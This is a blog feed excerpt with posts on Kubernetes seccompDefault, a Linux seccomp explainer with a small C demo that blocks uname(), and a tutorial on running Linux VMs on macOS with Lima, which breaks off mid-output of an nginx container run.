<p>You can verify whether it’s enabled on a node:</p>
<pre><code class="lang-bash">kubectl proxy &amp;
curl -s http://127.0.0.1:8001/api/v1/nodes/&lt;node-name&gt;/proxy/configz   | jq <span class="hljs-string">'.kubeletconfig.seccompDefault'</span>
</code></pre>
<p>If it returns <code>true</code>, pods without an explicit <code>seccompProfile</code> will automatically run under the runtime’s default profile.</p>
<p>If it’s <code>false</code>, a pod that doesn’t declare seccomp may run completely unconfined.</p>
<p>To enable it in kubeadm, update your <code>KubeletConfiguration</code>, which should be in <code>var/lib/kubelet/config.yaml</code>. Simply add the default setting.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">seccompDefault:</span> <span class="hljs-literal">true</span>
</code></pre>
<p>Then apply the configuration and restart the kubelet. With <code>seccompDefault: true</code>, <code>RuntimeDefault</code> becomes the cluster-wide baseline instead of an opt-in setting. Not too bad.</p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>It’s tempting to treat <code>RuntimeDefault</code> as some kind of security panacea, but of course it isn't.</p>
<p>The runtime’s default seccomp profile is designed to be broadly compatible. It allows hundreds of syscalls because most applications need them.</p>
<p>What it blocks are the obvious outliers like kernel keyring manipulation (bet you didn't think I would go there). That’s valuable. It reduces attack surface. But it does not create tight isolation.</p>
<p>If your application only needs 80 syscalls, and the runtime allows 377, you’re still exposing far more kernel surface than strictly necessary.</p>
<p><code>RuntimeDefault</code> is a baseline hygiene control.</p>
<p>It says:</p>
<blockquote>
<p>“We’re not going to allow clearly dangerous or unnecessary syscalls.”</p>
</blockquote>
<p>It does not say:</p>
<blockquote>
<p>“This workload has a minimal, workload-specific syscall surface.”</p>
</blockquote>
<p>For many teams, RuntimeDefault is the right tradeoff. It’s low friction, broadly safe, and rarely breaks applications. But it’s not a sandbox. It’s a compatibility-first safety net.</p>
]]></content:encoded></item><item><title><![CDATA[Seccomp: The Syscall Firewall]]></title><description><![CDATA[Introduction
We’ve already covered two Linux security mechanisms that show up in Kubernetes securityContext:

LSMs (mainly AppArmor)  
Capabilities.

Both matter. Both do real work. But there’s a third piece that’s just as important: seccomp.
If capa...]]></description><link>https://cloudsecburrito.com/seccomp-the-syscall-firewall</link><guid isPermaLink="true">https://cloudsecburrito.com/seccomp-the-syscall-firewall</guid><category><![CDATA[Linux]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[Seccomp]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Thu, 05 Feb 2026 08:06:51 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1770279397832/189be66f-f491-4476-aef9-9434bdc85ef6.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-introduction">Introduction</h2>
<p>We’ve already covered two Linux security mechanisms that show up in Kubernetes <code>securityContext</code>:</p>
<ul>
<li><a target="_blank" href="https://cloudsecburrito.com/linux-capabilities-a-beginners-overview">LSMs (mainly AppArmor)</a>  </li>
<li><a target="_blank" href="https://cloudsecburrito.com/kubernetes-runtime-enforcement-with-kubearmor">Capabilities</a>.</li>
</ul>
<p>Both matter. Both do real work. But there’s a third piece that’s just as important: <strong>seccomp</strong>.</p>
<p>If capabilities define <em>what powers a process has</em>, seccomp defines <em>which syscalls it’s even allowed to attempt</em>. It doesn’t care who you are or whether you’re root. It sits at the syscall boundary and says:</p>
<blockquote>
<p>This syscall exists.<br />That one doesn’t.<br />Try anyway and the kernel shuts it down.</p>
</blockquote>
<p><a target="_blank" href="https://man7.org/linux/man-pages/man2/seccomp.2.html">Seccomp</a> isn’t a Kubernetes feature. It’s a Linux kernel mechanism that predates containers, evolving from a blunt “read/write/exit” sandbox into a BPF-powered filter that decides which syscalls are allowed to exist at all.</p>
<p>The pattern should feel familiar:</p>
<ul>
<li><p>Root used to mean “try anything”</p>
</li>
<li><p>Capabilities split that power into smaller pieces</p>
</li>
</ul>
<p>Seccomp applies the same idea to syscalls:</p>
<ul>
<li><p>Old world: call whatever you want and see what happens</p>
</li>
<li><p>Seccomp: the kernel stops you before anything happens</p>
</li>
</ul>
<p>That distinction matters. Capabilities decide whether a syscall <em>succeeds</em>. LSMs decide whether a resource is <em>accessible</em>. <strong>Seccomp decides whether the syscall ever runs.</strong> Same kernel, different choke points.</p>
<p>This post stays focused on seccomp as a Linux primitive. This means where it comes from, how syscall filtering actually works, and what it means to block a syscall at the kernel boundary. We'll get to YAML and "hardening checklists" later.</p>
<hr />
<h2 id="heading-orientation-diagram-where-seccomp-intercepts-syscalls">Orientation Diagram: Where Seccomp Intercepts Syscalls</h2>
<p>Keep this diagram in mind. Everything in this post is about what happens at the syscall boundary. This is before permissions, before resources, and before the kernel ever executes a syscall. This is about where seccomp lives in Linux.  </p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770161814784/94a3eef4-8d31-4066-83a7-57cb0f06ca10.png" alt class="image--center mx-auto" /></p>
<hr />
<h2 id="heading-where-seccomp-runs-in-the-kernel">Where Seccomp Runs in the Kernel</h2>
<p>Seccomp doesn’t live inside a syscall implementation, and it doesn’t care what the syscall is <em>trying</em> to do. Once enabled, the kernel evaluates seccomp <strong>before</strong> it dispatches the syscall to its real handler. If the filter says no, the syscall never executes.</p>
<p>That ordering is a key detail. When a process makes a syscall, the kernel first checks whether seccomp is active for that process. If it is, the kernel runs the attached BPF filter and asks a single question: Is this syscall allowed to exist for this process?</p>
<p>Only an explicit allow causes the kernel to continue. Otherwise, the kernel returns an error, sends a signal, or kills the process, never reaching the syscall’s implementation. From the kernel’s perspective, a blocked syscall is indistinguishable from one that was never there.</p>
<h3 id="heading-why-seccomp-is-a-different-control-layer">Why Seccomp Is a Different Control Layer</h3>
<p>This is also why seccomp doesn’t overlap cleanly with capabilities or LSMs.</p>
<p>Capabilities and LSMs operate <strong>after</strong> the syscall has already been selected:</p>
<ul>
<li><p>Capabilities decide whether a syscall is allowed to perform privileged actions</p>
</li>
<li><p>LSMs decide whether access to a specific object (file, socket, mount) is permitted</p>
</li>
</ul>
<p>Seccomp runs earlier than both. It doesn’t reason about permissions or resources. It only answers whether a syscall is permitted to run at all. That makes seccomp the earliest enforcement point. It is a hard gate in front of the syscall table itself.</p>
<h3 id="heading-the-one-way-property">The One-Way Property</h3>
<p>Once a process enters a seccomp mode, it cannot leave it.</p>
<p>The kernel enforces seccomp as a one-way transition: unrestricted to restricted, never the reverse. The active seccomp state is stored directly on the process and inherited across forks and execs. There is no API to remove or weaken a filter once it’s in place. Seccomp is designed so a process can only reduce its own attack surface, never expand it later.</p>
<p>This raises two obvious questions: Who enables seccomp in the first place and when does that happen?</p>
<hr />
<h2 id="heading-how-seccomp-gets-enabled">How Seccomp Gets Enabled</h2>
<p>Seccomp doesn’t apply itself automatically, and it isn’t something the kernel turns on by default. A process only enters a secure computing state when something explicitly asks the kernel to enable it.</p>
<p>That "something" is usually:</p>
<ul>
<li><p>the process itself</p>
</li>
<li><p>or a parent process acting as a supervisor (systemd, a container runtime, a sandbox)</p>
</li>
</ul>
<p>At the kernel level, this happens through two syscalls:</p>
<ul>
<li><p><code>prctl()</code></p>
</li>
<li><p><code>seccomp()</code></p>
</li>
</ul>
<p>Both tell the kernel to place the current process into a seccomp mode.</p>
<h3 id="heading-seccomp-is-enabled-per-process">Seccomp Is Enabled Per Process</h3>
<p>Seccomp is a per-process setting. When it’s enabled, the kernel records that state directly on the process:</p>
<pre><code class="lang-bash">task_struct.seccomp.mode
task_struct.seccomp.filter
</code></pre>
<p>From that point on:</p>
<ul>
<li><p>every syscall made by the process is subject to seccomp checks</p>
</li>
<li><p>all threads in the process share the same seccomp state</p>
</li>
<li><p>child processes created via <code>fork()</code> inherit it</p>
</li>
<li><p><code>execve()</code> does not reset it</p>
</li>
</ul>
<p>This transition is one-way: unrestricted → restricted. There is no mechanism to remove or weaken a filter once it’s active.</p>
<h3 id="heading-what-prctl-is">What <code>prctl()</code> Is</h3>
<p><code>prctl()</code> isn’t part of the normal syscall execution path. It’s a configuration syscall used to change process behavior.</p>
<p>When a program calls:</p>
<pre><code class="lang-c">prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &amp;filter);
</code></pre>
<p>it isn’t routing syscalls through <code>prctl()</code>. It’s making a one-time request: Attach this seccomp filter to the current process. After that, <code>prctl()</code> is out of the picture. All future syscalls follow the normal entry path. They just get evaluated by seccomp first.</p>
<h3 id="heading-who-enables-seccomp-in-practice">Who Enables Seccomp in Practice</h3>
<p>Most applications don’t enable seccomp themselves. Instead, it’s usually done by whatever launches the process:</p>
<ul>
<li><p><strong>systemd</strong></p>
</li>
<li><p><strong>container runtimes</strong> </p>
</li>
<li><p><strong>application sandboxes</strong> </p>
</li>
</ul>
<p>The pattern is consistent:</p>
<ol>
<li><p>The parent process loads a seccomp filter</p>
</li>
<li><p>It enables seccomp on the child <em>before exec</em></p>
</li>
<li><p>The application starts already inside a secure computing state</p>
</li>
</ol>
<p>By the time application code runs, seccomp is already enforced.</p>
<hr />
<h2 id="heading-where-we-are-so-far">Where We Are So Far</h2>
<p>So far, we’ve stayed intentionally close to the kernel.</p>
<p>We’ve looked at where seccomp runs in the syscall path, how it gets enabled, and how a syscall can be blocked before the kernel ever executes it. That’s the core idea: seccomp reduces attack surface by deciding which syscalls are allowed to exist for a process.</p>
<p>At this point, we’ve talked about seccomp in the abstract. The next step is to make that concrete. But, before we look at a real example, we need to clarify one last piece of terminology: what a “seccomp profile” actually is under the hood.</p>
<hr />
<h2 id="heading-what-a-seccomp-profile-actually-is">What a Seccomp “Profile” Actually Is</h2>
<p>A seccomp profile is <strong>not</strong> a policy language, nor a permissions model, and definitely not a Kubernetes abstraction.</p>
<p>At the kernel level, a seccomp profile is simply this:</p>
<blockquote>
<p><strong>A BPF program attached to a process that evaluates every syscall before it runs.</strong> Check out more on BPF <a target="_blank" href="https://docs.kernel.org/bpf/">here</a>.</p>
</blockquote>
<p>Everything else is packaging.</p>
<h3 id="heading-profiles-are-filters-not-rules">Profiles Are Filters, Not Rules</h3>
<p>When seccomp runs in filter mode, the kernel executes a BPF program on every syscall. That program receives a small amount of context (the syscall number, its arguments, and the architecture). Then it gives a verdict.</p>
<p>That verdict isn’t abstract. It’s one of a small set of concrete actions:</p>
<ul>
<li><p>allow the syscall to proceed</p>
</li>
<li><p>return an error (for example, <code>EPERM</code>)</p>
</li>
<li><p>send a signal</p>
</li>
<li><p>or terminate the process</p>
</li>
</ul>
<p>There’s no concept of users, roles, or resources here. The filter doesn’t know <em>why</em> a syscall is happening, only <em>which</em> syscall it is.</p>
<h3 id="heading-default-deny-is-the-point">Default-Deny Is the Point</h3>
<p>Real seccomp profiles often start from a default action like:</p>
<pre><code class="lang-bash">DENY
</code></pre>
<p>and then explicitly allow only the syscalls the process needs. This isn’t about detecting bad behavior. It’s about reducing attack surface. From the kernel’s perspective, allowed syscalls exist; everything else does not.</p>
<p>Capabilities and LSMs can only restrict what a syscall is allowed to do. Seccomp can prevent the syscall from running at all.</p>
<h3 id="heading-tooling-is-just-a-compiler">Tooling Is Just a Compiler</h3>
<p>Most people never write BPF by hand. Instead, they interact with seccomp through tools and profile formats:</p>
<ul>
<li><p><code>libseccomp</code></p>
</li>
<li><p>runtime-provided defaults</p>
</li>
<li><p>human-readable profile files</p>
</li>
</ul>
<p>All of these do the same thing:</p>
<ol>
<li><p>Take a list of allowed syscalls</p>
</li>
<li><p>Compile it into a BPF program</p>
</li>
<li><p>Attach that program to the process</p>
</li>
</ol>
<p>Once the filter is loaded, the kernel doesn’t care how it was generated. At runtime, we get a BPF program and a verdict.</p>
<p>Let's go full burrito and see how it actually works.</p>
<hr />
<h2 id="heading-a-concrete-example-what-seccomp-actually-does">A Concrete Example: What Seccomp Actually Does</h2>
<p>Let's walk through a tiny program that installs a seccomp filter at runtime and then makes a few syscalls before and after that filter is in place. The goal isn’t to write production-grade seccomp policy. We just want to make the enforcement behavior obvious.</p>
<h3 id="heading-what-were-trying-to-show">What We’re Trying to Show</h3>
<p>This program is intentionally simple, and it runs in a very specific order:</p>
<ul>
<li><p>It makes a few normal syscalls (<code>getpid()</code>, <code>uname()</code>) before any filtering is applied</p>
</li>
<li><p>It installs a seccomp <strong>filter-mode</strong> profile at runtime</p>
</li>
<li><p>It repeats those same syscalls after the filter is active</p>
</li>
<li><p>One syscall still succeeds because it’s explicitly allowed</p>
</li>
<li><p>One syscall fails because seccomp blocks it at the syscall boundary</p>
</li>
</ul>
<p>That before-and-after contrast lets us see seccomp doing exactly what it’s designed to do: <strong>stop a syscall before the kernel ever executes it</strong>.</p>
<p>To make the behavior obvious, the filter allows only a small set of syscalls:</p>
<ul>
<li><p><code>getpid()</code></p>
</li>
<li><p><code>read</code>, <code>write</code>, <code>exit</code>, <code>exit_group</code></p>
</li>
</ul>
<p>Everything else is implicitly denied, including:</p>
<ul>
<li><code>uname()</code></li>
</ul>
<p>Any syscall that isn’t explicitly allowed will fail with <code>EPERM</code>.</p>
<h3 id="heading-the-demo-program">The Demo Program</h3>
<pre><code class="lang-c"><span class="hljs-comment">// seccomp_demo.c</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> _GNU_SOURCE</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;seccomp.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdio.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdlib.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;unistd.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;errno.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;string.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;sys/utsname.h&gt;</span></span>

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">die</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *msg)</span> </span>{
    perror(msg);
    <span class="hljs-built_in">exit</span>(EXIT_FAILURE);
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">print_uname</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *label)</span> </span>{
    <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">utsname</span> <span class="hljs-title">u</span>;</span>
    <span class="hljs-keyword">int</span> rc = uname(&amp;u);
    <span class="hljs-keyword">if</span> (rc == <span class="hljs-number">-1</span>) {
        <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s: uname() failed: errno=%d (%s)\n"</span>,
               label, errno, strerror(errno));
    } <span class="hljs-keyword">else</span> {
        <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s: uname() ok: sysname=%s, release=%s\n"</span>,
               label, u.sysname, u.release);
    }
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">install_seccomp_filter</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{
    <span class="hljs-keyword">int</span> rc;
    scmp_filter_ctx ctx;

    ctx = seccomp_init(SCMP_ACT_ERRNO(EPERM));
    <span class="hljs-keyword">if</span> (ctx == <span class="hljs-literal">NULL</span>) {
        die(<span class="hljs-string">"seccomp_init"</span>);
    }

    rc  = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), <span class="hljs-number">0</span>);
    rc |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), <span class="hljs-number">0</span>);
    rc |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(<span class="hljs-built_in">exit</span>), <span class="hljs-number">0</span>);
    rc |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), <span class="hljs-number">0</span>);
    rc |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), <span class="hljs-number">0</span>);

    <span class="hljs-keyword">if</span> (rc &lt; <span class="hljs-number">0</span>) {
        seccomp_release(ctx);
        die(<span class="hljs-string">"seccomp_rule_add"</span>);
    }

    rc = seccomp_load(ctx);
    <span class="hljs-keyword">if</span> (rc &lt; <span class="hljs-number">0</span>) {
        seccomp_release(ctx);
        die(<span class="hljs-string">"seccomp_load"</span>);
    }

    seccomp_release(ctx);
}

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{
    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"== Before seccomp ==\n"</span>);

    <span class="hljs-keyword">pid_t</span> pid = getpid();
    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"before: getpid() = %d\n"</span>, pid);

    print_uname(<span class="hljs-string">"before"</span>);

    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"\nInstalling seccomp filter (default DENY, allow read/write/exit/getpid)...\n\n"</span>);
    install_seccomp_filter();

    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"== After seccomp ==\n"</span>);

    pid = getpid();
    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"after: getpid() = %d (still works)\n"</span>, pid);

    print_uname(<span class="hljs-string">"after"</span>);

    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"\nDone.\n"</span>);
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<h3 id="heading-prereqs">Prereqs</h3>
<p>Ensure you have seccomp.</p>
<pre><code class="lang-bash">matt@cp:~/seccomp$ sudo apt update
sudo apt install -y libseccomp-dev
</code></pre>
<h3 id="heading-compile-and-run">Compile and Run</h3>
<pre><code class="lang-bash">matt@cp:~/seccomp$ ./seccomp_demo
== Before seccomp ==
before: getpid() = 10746
before: uname() ok: sysname=Linux, release=6.8.0-90-generic

Installing seccomp filter (default DENY, allow <span class="hljs-built_in">read</span>/write/<span class="hljs-built_in">exit</span>/getpid)...

== After seccomp ==
after: getpid() = 10746 (still works)
after: uname() failed: errno=1 (Operation not permitted)

Done.
</code></pre>
<p>At this point, we’ve seen seccomp in action!</p>
<hr />
<h2 id="heading-what-actually-happened">What Actually Happened</h2>
<p>Before seccomp was enabled, the program’s syscalls followed the normal execution path. Calls like <code>getpid()</code> and <code>uname()</code> entered the kernel, were dispatched to their respective implementations, and returned results as expected. When the seccomp filter was installed, the kernel attached a BPF program to the process and marked it as running in seccomp filter mode. From that point on, every syscall issued by the process was evaluated against that filter before the kernel considered executing it.</p>
<p>After seccomp was active, <code>getpid()</code> continued to work because it matched an explicit allow rule. The call to <code>uname()</code>, however, did not. The seccomp filter returned a denial verdict, and the kernel immediately enforced it by returning an error to userspace. The <code>sys_uname()</code> implementation was never reached.</p>
<p>Nothing else happened behind the scenes. There was no permission check, no resource evaluation, and no fallback logic. The syscall was intercepted, a verdict was returned, and the kernel enforced it.</p>
<p>That is seccomp doing exactly what it is designed to do.</p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>The demo showed seccomp doing one thing, very reliably: preventing a syscall from ever reaching the kernel implementation. Once a filter returns a verdict, the kernel enforces it and moves on. That enforcement point is what makes seccomp different from the other kernel controls we’ve looked at. Capabilities constrain what a syscall can do. LSMs constrain what a syscall can touch. Seccomp runs earlier than both and reduces attack surface by deciding which syscalls are allowed to exist in the first place.</p>
<p>This is why seccomp works best as a complement, not a replacement. It doesn’t understand intent, resources, or permissions, but it doesn’t need to. Its job is to shrink the set of possible behaviors before any of those questions even come up.</p>
<p>This post stayed intentionally close to the kernel. Before seccomp appears as a profile, a default, or a field in configuration, it’s a Linux mechanism with specific behavior and tradeoffs. Understanding that behavior is what makes higher-level abstractions predictable instead of mysterious.</p>
<p>In the next post, we’ll move up a layer and look at how container runtimes and Kubernetes wire this kernel primitive into pods. And we'll see why defaults like <code>RuntimeDefault</code> matter more than they first appear.</p>
]]></content:encoded></item><item><title><![CDATA[Lima: Linux on macOS Without the Ceremony]]></title><description><![CDATA[Introduction
Start with Linux. On macOS, if you want to do real container or Kubernetes work, the first decision isn’t Kubernetes at all, but rather how you’re going to run Linux. So far, my default approach has been a full Linux VM via UTM, with the...]]></description><link>https://cloudsecburrito.com/lima-linux-on-macos-without-the-ceremony</link><guid isPermaLink="true">https://cloudsecburrito.com/lima-linux-on-macos-without-the-ceremony</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[macOS]]></category><category><![CDATA[Linux]]></category><category><![CDATA[virtual machine]]></category><category><![CDATA[Lima]]></category><category><![CDATA[containers]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Thu, 29 Jan 2026 00:41:53 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1769647081684/f3891db0-52e8-4e51-bc76-73b2dbd16183.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-introduction">Introduction</h2>
<p>Start with Linux. On macOS, if you want to do real container or Kubernetes work, the first decision isn’t Kubernetes at all, but rather how you’re going to run Linux. So far, my default approach has been a full Linux VM via UTM, with the OS depending on the goal: Ubuntu for familiarity, Talos for opinionated immutability, or something else when I want to experiment.</p>
<p>Kubernetes is a separate decision that comes after that. Once you have Linux, you choose how you want Kubernetes to show up:</p>
<ul>
<li><p>kubeadm when you want to understand how clusters are actually built</p>
</li>
<li><p>Talos when you want a tightly controlled, production-shaped system</p>
</li>
<li><p>Minikube when you want something running quickly and don’t care much about what it’s doing under the hood</p>
</li>
</ul>
<p>Linux VM first, Kubernetes second is honest, flexible, and how real clusters cam come into existence. It’s also a lot of setup if all you want is a disposable sandbox.</p>
<p>This is where Lima changes the flow. <a target="_blank" href="https://lima-vm.io/">Lima</a> collapses those steps. It gives you an easy, disposable Linux VM. And if you want a lightweight Kubernetes setup it is a great choice. Under the hood, it’s still VMs and still real Linux, but it’s optimized for iteration, not realism. That makes it an excellent starting point if you’re new, and a useful shortcut even if you’re already comfortable with kubeadm or Talos.</p>
<p>It’s not a replacement for a “real” cluster, but it is a faster way to get up and running.</p>
<p>If you take away one thing from this, it's stop running Minikube on your Mac.</p>
<hr />
<h2 id="heading-orientation-diagram-where-lima-fits">Orientation Diagram: Where Lima Fits</h2>
<p>Keep this diagram in mind. Everything in this post is about how quickly Lima gets you to a real Linux environment. It's not about changing how Linux or Kubernetes actually work.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1769647183318/38fb8c01-fa60-4ae6-bfa2-77d648e52ac0.png" alt class="image--center mx-auto" /></p>
<hr />
<h2 id="heading-what-lima-is">What Lima Is</h2>
<p>Lima is a developer-focused way to run Linux virtual machines on macOS. At its core, Lima does one thing well: it makes running Linux easy.</p>
<p>It orchestrates Linux VMs using QEMU on the host and handles the glue that makes those VMs usable for day-to-day work. This includes lifecycle management, networking, filesystem mounts, and access. You describe the VM you want, Lima starts it, and you interact with it directly.</p>
<p>Practically, that means:</p>
<ul>
<li><p>A real Linux instance running in a VM</p>
</li>
<li><p>SSH access by default</p>
</li>
<li><p>Port forwarding so services inside the VM are reachable from macOS</p>
</li>
<li><p>Filesystem mounts so the VM feels a bit more local</p>
</li>
</ul>
<p>There’s no GUI. Lima is designed to stay out of your way once the VM is running, just as we like.</p>
<p>At this point, it should be painfully obvious that Lima is a dead-simple way to get a lab running or do local testing without ceremony.</p>
<blockquote>
<p>On macOS, Lima uses QEMU as the underlying VM engine. I’m intentionally not going deep on QEMU here, which applies equally to UTM. This will get its own post in the future.</p>
</blockquote>
<hr />
<h2 id="heading-quick-linux-sanity-check-run-a-simple-http-server">Quick Linux Sanity Check: Run a Simple HTTP Server</h2>
<p>Before doing anything more interesting, let’s get it running.</p>
<h3 id="heading-install-lima">Install Lima</h3>
<p>On your Mac it is a simple to <a target="_blank" href="https://lima-vm.io/docs/installation/">install</a>.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % brew install lima
✔︎ JSON API cask.jws.json                                                                                                                  Downloaded   15.3MB/ 15.3MB
✔︎ JSON API formula.jws.json                                                                                                               Downloaded   32.0MB/ 32.0MB
==&gt; Fetching downloads <span class="hljs-keyword">for</span>: lima
✔︎ Bottle Manifest lima (2.0.3)                                                                                                            Downloaded   41.6KB/ 41.6KB
✔︎ Bottle lima (2.0.3)                                                                                                                     Downloaded   37.8MB/ 37.8MB
==&gt; Pouring lima--2.0.3.arm64_tahoe.bottle.1.tar.gz
...
==&gt; Summary
🍺  /opt/homebrew/Cellar/lima/2.0.3: 117 files, 77.6MB
</code></pre>
<h3 id="heading-start-a-vm-and-get-a-shell">Start a VM and Get a Shell</h3>
<p>Run a Lima VM.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % limactl start
? Creating an instance <span class="hljs-string">"default"</span> Proceed with the current configuration
...
INFO[0010] [hostagent] [VZ] - vm state change: running
INFO[0019] [hostagent] Started vsock forwarder: 127.0.0.1:63216 -&gt; vsock:22 on VM
INFO[0019] [hostagent] Detected SSH server is listening on the vsock port; changed 127.0.0.1:63216 to proxy <span class="hljs-keyword">for</span> the vsock port
INFO[0020] SSH Local Port: 63216
...
INFO[0042] [hostagent] Forwarding TCP from 127.0.0.1:36217 to 127.0.0.1:36217
INFO[0053] [hostagent] The final requirement 1 of 1 is satisfied
INFO[0053] READY. Run `lima` to open the shell.
</code></pre>
<p>Cool, let's see what we've got.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % limactl ls
NAME       STATUS     SSH                VMTYPE    ARCH       CPUS    MEMORY    DISK      DIR
default    Running    127.0.0.1:62655    vz        aarch64    4       4GiB      100GiB    ~/.lima/default
</code></pre>
<p>Actually nicely sized for K8s ootb.</p>
<p>Let's get a shell.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % lima
lima@lima-default:/Users/matt.brown$ <span class="hljs-built_in">cd</span>
lima@lima-default:~$
</code></pre>
<p>At this point, you’re inside the Linux VM. Not a container, just a VM.</p>
<h3 id="heading-verify-what-youre-running">Verify What You’re Running</h3>
<p>A couple of quick checks should show we're in a Linux instance. They do Ubuntu ootb, totally likes us.</p>
<pre><code class="lang-bash">lima@lima-default:~$ uname -a
cat /etc/os-release
Linux lima-default 6.17.0-8-generic <span class="hljs-comment">#8-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 20:54:15 UTC 2025 aarch64 GNU/Linux</span>
PRETTY_NAME=<span class="hljs-string">"Ubuntu 25.10"</span>
NAME=<span class="hljs-string">"Ubuntu"</span>
VERSION_ID=<span class="hljs-string">"25.10"</span>
VERSION=<span class="hljs-string">"25.10 (Questing Quokka)"</span>
VERSION_CODENAME=questing
ID=ubuntu
ID_LIKE=debian
HOME_URL=<span class="hljs-string">"https://www.ubuntu.com/"</span>
SUPPORT_URL=<span class="hljs-string">"https://help.ubuntu.com/"</span>
BUG_REPORT_URL=<span class="hljs-string">"https://bugs.launchpad.net/ubuntu/"</span>
PRIVACY_POLICY_URL=<span class="hljs-string">"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"</span>
UBUNTU_CODENAME=questing
LOGO=ubuntu-logo
</code></pre>
<h3 id="heading-start-a-simple-http-server">Start a Simple HTTP Server</h3>
<p>Ubuntu already has Python installed, so no setup required. Just create a directory with a simple html file.</p>
<pre><code class="lang-bash">lima@lima-default:~$ mkdir -p /tmp/web
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Hello from Lima"</span> &gt; /tmp/web/index.html
python3 -m http.server 8000 --directory /tmp/web
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
</code></pre>
<p>That’s a real process listening on a real Linux network interface inside the VM.</p>
<h3 id="heading-access-it-from-macos">Access It from macOS</h3>
<p>From your Mac, open a browser and hit:</p>
<pre><code class="lang-bash">http://localhost:8000
</code></pre>
<p>You should get a directory listing from <em>Hello from Lima</em>.</p>
<h3 id="heading-what-just-happened">What Just Happened</h3>
<ul>
<li><p>The HTTP server is running inside the Linux VM</p>
</li>
<li><p>Lima forwarded the port to the host automatically</p>
</li>
<li><p>You didn’t install Docker or Kubernetes</p>
</li>
<li><p>You can see and control every layer involved</p>
</li>
</ul>
<p>And as an F1 great would say, <em>simply lovely</em>.</p>
<hr />
<h2 id="heading-a-single-container-just-to-prove-the-point">A Single Container (Just to Prove the Point)</h2>
<p>Before touching Kubernetes, it’s worth showing the smallest possible container example. This is still just Linux, running a container directly inside the VM.</p>
<p>The default Lima VM comes with <code>containerd</code> and <code>nerdctl</code>, so there’s nothing extra to install.</p>
<p>Use <code>lima</code> and <code>nerdctl</code> to fire up a container.</p>
<pre><code class="lang-bash">matt.brown@matt ~ % lima nerdctl run -d --name nginx -p 8080:80 nginx:alpine
docker.io/library/nginx:alpine:                                                   resolved       |++++++++++++++++++++++++++++++++++++++|
index-sha256:b0f7830b6bfaa1258f45d94c240ab668ced1b3651c8a222aefe6683447c7bf55:    <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
manifest-sha256:969208a59fcbe5ed11f50a57fa6a0a023aa6311702f5fc252ac502a8a4d25c8a: <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
config-sha256:a6e56e8d6213d3aa3046e4a1cb49d6ed133a1afc9178d8c17cbec445e330537a:   <span class="hljs-keyword">done</span>           |++++++++++++++++++++++++++++++++++++++|
